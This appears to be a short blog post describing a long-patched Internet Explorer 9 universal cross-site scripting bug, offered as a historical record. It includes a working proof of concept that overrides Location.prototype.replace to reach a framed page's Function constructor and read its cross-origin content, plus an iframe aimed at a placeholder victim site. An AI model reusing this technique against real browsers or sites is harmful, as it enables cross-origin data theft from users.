IE9 UXSS: Location.prototype.replace Intercepts Cross-Origin Frame-Breaking

By overriding Location.prototype.replace on the top-level window, an attacker page could intercept any call to location.replace() made by a framed page — including the common frame-breaking pattern top.location.replace(...). At the moment of interception, arguments.callee.caller.constructor gave access to the Function constructor of the calling context, allowing cross-origin document access.

Location.prototype.replace = function() {
    xFunction = arguments.callee.caller.constructor;
    xFunction("alert(document.URL + '\\n\\n' + document.body.innerHTML)")();
};
// Then load a page with frame-breaking code (top.location.replace(...))

<iframe src="http://www.victim.com/framebreaker2.html"></iframe>

One important constraint: the argument to location.replace in the victim page had to be a number or empty — if it was a string, the prototype override path was not taken. Pages that used top.location.replace(someStringUrl) as their frame-breaking code were protected by this quirk.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Crash: D3D VMware Driver Fault on Window Open and Navigate] :: [IE9: Prompt and VBScript InputBox Not Blocked Without User Interaction] >